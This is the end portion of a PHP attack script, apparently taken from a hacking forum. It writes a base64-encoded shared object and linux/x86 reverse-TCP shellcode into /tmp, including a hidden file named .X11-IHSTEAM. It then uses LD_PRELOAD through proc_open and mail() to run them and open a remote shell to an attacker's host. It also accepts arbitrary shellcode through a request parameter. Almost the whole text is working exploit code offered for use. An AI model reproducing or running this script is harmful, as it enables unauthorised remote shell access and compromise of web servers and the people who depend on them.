AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/////wAAAAD/////AAAAAAAAAAABAAAA
XgAAAAwAAACQAwAADQAAAAgGAAAEAAAA9AAAAPX+/29AAQAABQAAAFwCAAAGAAAAfAEAAAoAAACW
AAAACwAAABAAAAADAAAA9B8AAAIAAAAwAAAAFAAAABEAAAAXAA AAYAMAABEAAABAAwAAEgAAACAA
AAATAAAACAAAAP7//28QAwAA////bwEAAADw//9v8gIAAPr//28BAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC AfAAAAAAAAAAAAAL4DAADOAwAA
3gMAAO4DAAD+AwAADgQAABggAAAAR0NDOiAoR2VudG9vIDQuMy 4xLXIxIHAxLjEpIDQuMy4xAABH
Q0M6IChHZW50b28gNC4zLjIgcDEuMSkgNC4zLjIAAEdDQzogKE dlbnRvbyA0LjMuMiBwMS4xKSA0
LjMuMgAAR0NDOiAoR2VudG9vIDQuMy4yIHAxLjEpIDQuMy4yAA BHQ0M6IChHZW50b28gNC4zLjEt
cjEgcDEuMSkgNC4zLjEAAC5zeW10YWIALnN0cnRhYgAuc2hzdH J0YWIALmdudS5oYXNoAC5keW5z
eW0ALmR5bnN0cgAuZ251LnZlcnNpb24ALmdudS52ZXJzaW9uX3 IALnJlbC5keW4ALnJlbC5wbHQA
LmluaXQALnRleHQALmZpbmkALnJvZGF0YQAuZWhfZnJhbWUALm N0b3JzAC5kdG9ycwAuamNyAC5k
eW5hbWljAC5nb3QALmdvdC5wbHQALmRhdGEALmJzcwAuY29tbW VudAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB8AAAAFAAAAAgAAAP QAAAD0AAAATAAAAAMAAAAAAAAA
BAAAAAQAAAAbAAAA9v//bwIAAABAAQAAQAEAADwAAAADAAAAAAAAAAQAAAAEAAAAJQAAAA sAAAAC
AAAAfAEAAHwBAADgAAAABAAAAAEAAAAEAAAAEAAAAC0AAAADAA AAAgAAAFwCAABcAgAAlgAAAAAA
AAAAAAAAAQAAAAAAAAA1AAAA////bwIAAADyAgAA8gIAABwAAAADAAAAAAAAAAIAAAACAAAAQgAA
AP7//28CAAAAEAMAABADAAAwAAAABAAAAAEAAAAEAAAAAAAAAFEAAAA JAAAAAgAAAEADAABAAwAA
IAAAAAMAAAAAAAAABAAAAAgAAABaAAAACQAAAAIAAABgAwAAYA MAADAAAAADAAAACgAAAAQAAAAI
AAAAYwAAAAEAAAAGAAAAkAMAAJADAAAXAAAAAAAAAAAAAAAEAA AAAAAAAF4AAAABAAAABgAAAKgD
AACoAwAAcAAAAAAAAAAAAAAABAAAAAQAAABpAAAAAQAAAAYAAA AgBAAAIAQAAOgBAAAAAAAAAAAA
ABAAAAAAAAAAbwAAAAEAAAAGAAAACAYAAAgGAAAcAAAAAAAAAA AAAAAEAAAAAAAAAHUAAAABAAAA
AgAAACQGAAAkBgAAHQAAAAAAAAAAAAAAAQAAAAAAAAB9AAAAAQ AAAAIAAABEBgAARAYAAAQAAAAA
AAAAAAAAAAQAAAAAAAAAhwAAAAEAAAADAAAADB8AAAwPAAAIAA AAAAAAAAAAAAAEAAAAAAAAAI4A
AAABAAAAAwAAABQfAAAUDwAACAAAAAAAAAAAAAAABAAAAAAAAA CVAAAAAQAAAAMAAAAcHwAAHA8A
AAQAAAAAAAAAAAAAAAQAAAAAAAAAmgAAAAYAAAADAAAAIB8AAC APAADIAAAABAAAAAAAAAAEAAAA
CAAAAKMAAAABAAAAAwAAAOgfAADoDwAADAAAAAAAAAAAAAAABA AAAAQAAACoAAAAAQAAAAMAAAD0
HwAA9A8AACQAAAAAAAAAAAAAAAQAAAAEAAAAsQAAAAEAAAADAA AAGCAAABgQAAAEAAAAAAAAAAAA
AAAEAAAAAAAAALcAAAAIAAAAAwAAABwgAAAcEAAACAAAAAAAAA AAAAAABAAAAAAAAAC8AAAAAQAA
AAAAAAAAAAAAHBAAAKYAAAAAAAAAAAAAAAEAAAAAAAAAEQAAAA MAAAAAAAAAAAAAAMIQAADFAAAA
AAAAAAAAAAABAAAAAAAAAAEAAAACAAAAAAAAAAAAAADAFQAAsA IAABoAAAAeAAAABAAAABAAAAAJ
AAAAAwAAAAAAAAAAAAAAcBgAAAsBAAAAAAAAAAAAAAEAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAA
AAD0AAAAAAAAAAMAAQAAAAAAQAEAAAAAAAADAAIAAAAAAHwBAA AAAAAAAwADAAAAAABcAgAAAAAA
AAMABAAAAAAA8gIAAAAAAAADAAUAAAAAABADAAAAAAAAAwAGAA AAAABAAwAAAAAAAAMABwAAAAAA
YAMAAAAAAAADAAgAAAAAAJADAAAAAAAAAwAJAAAAAACoAwAAAA AAAAMACgAAAAAAIAQAAAAAAAAD
AAsAAAAAAAgGAAAAAAAAAwAMAAAAAAAkBgAAAAAAAAMADQAAAA AARAYAAAAAAAADAA4AAAAAAAwf
AAAAAAAAAwAPAAAAAAAUHwAAAAAAAAMAEAAAAAAAHB8AAAAAAA ADABEAAAAAACAfAAAAAAAAAwAS
AAAAAADoHwAAAAAAAAMAEwAAAAAA9B8AAAAAAAADABQAAAAAAB ggAAAAAAAAAwAVAAAAAAAcIAAA
AAAAAAMAFgAAAAAAAAAAAAAAAAADABcAAQAAAAAAAAAAAAAABA Dx/w0AAAD0HwAAAAAAAAEC8f8j
AAAAGCAAAAAAAAABAhUAMAAAABgfAAAAAAAAAQIQAD0AAAAHBQ AAAAAAAAICCwBUAAAAIB8AAAAA
AAABAvH/XQAAAAAAAAB6AAAAEgAAAG0AAAAAAAAAAAAAACAAAAB8AAAAAA AAAAAAAAAgAAAAkAAA
AAAAAAD+AAAAEgAAAKQAAAAIBgAAAAAAABIADACqAAAAAAAAAH oAAAASAAAAugAAABwgAAAAAAAA
EADx/8YAAAAMBQAAvQAAABIACwDNAAAAJCAAAAAAAAAQAPH/0gAAABwgAAAAAAAAEADx/9kAAAAA
AAAACwEAACIAAAD1AAAAAAAAAP0AAAASAAAABQEAAJADAAAAAA AAEgAJAABzaGVsbGNvZGUuYwBf
R0xPQkFMX09GRlNFVF9UQUJMRV8AX19kc29faGFuZGxlAF9fRF RPUl9FTkRfXwBfX2k2ODYuZ2V0
X3BjX3RodW5rLmJ4AF9EWU5BTUlDAG9wZW5AQEdMSUJDXzIuMA BfX2dtb25fc3RhcnRfXwBfSnZf
UmVnaXN0ZXJDbGFzc2VzAHVuc2V0ZW52QEBHTElCQ18yLjAAX2 ZpbmkAcmVhZEBAR0xJQkNfMi4w
AF9fYnNzX3N0YXJ0AGdldHVpZABfZW5kAF9lZGF0YQBfX2N4YV 9maW5hbGl6ZUBAR0xJQkNfMi4x
LjMAZXhpdEBAR0xJQkNfMi4wAF9pbml0AA==" ;
}
if (!function_exists('file_put_contents')){
function file_put_contents($filename, $data){
$f = @fopen($filename, 'w');
if (!$f){
return false;
}
else{
$bytes = fwrite($f, $data);
fclose($f);
return $bytes;
}
}
}
// Note: change kolang.php and shellcode loader if sys_get_temp_dir()!='/tmp'
file_put_contents('/tmp/shellcode.so' , base64_decode($shellcode_loader));
$ip = gethostbyname($host);
$port1 = sprintf('%c', ($port>> 8)&255 );
$port2 = sprintf('%c', ($port>> 0)&255 );
$part = explode('.', $ip);
//$HEXIP = sprintf('%02x%02x%02x%02x', $part[0], $part[1], $part[2], $part[3]);
$STRINGIP = sprintf('%c%c%c%c', $part[0], $part[1], $part[2], $part[3]);
/*
* linux/x86/shell_reverse_tcp - 71 bytes
* Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
* Encoder: generic/none
* LHOST=$STRINGIP, LPORT=$port1.$port2, ReverseConnectRetries=5,
* PrependSetresuid=false, PrependSetreuid=false,
* PrependSetuid=false, PrependChrootBreak=false,
* AppendExit=false
*/
$Xshellcode =
"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\ x66\xcd\x80".
"\x5b\x5e\x68".$STRINGIP."\x66\x68".$port1.$port2. "\x66\x53\x6a\x10".
"\x51\x50\x89\xe1\x43\x6a\x66\x58\xcd\x80\x59\x87\ xd9\xb0\x3f".
"\xcd\x80\x49\x79\xf9\x50\x68\x2f\x2f\x73\x68\x68\ x2f\x62\x69".
"\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80\ x00" ;
if(isset($_REQUEST['shellcode'])){
// just for fans of metasploit
$Xshellcode=base64_decode($_REQUEST['shellcode']);
}
file_put_contents("/tmp/.X11-IHSTEAM", $Xshellcode);
$cwd = '/tmp/';
$env = array('LD_PRELOAD' => '/tmp/shellcode.so');
unset($var);
$descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"));
// BOOM
proc_open('IHSteam', $descriptorspec, $var, $cwd, $env);
mail("IHSteam","IHSteam","IHSteam","IHSteam");
?>
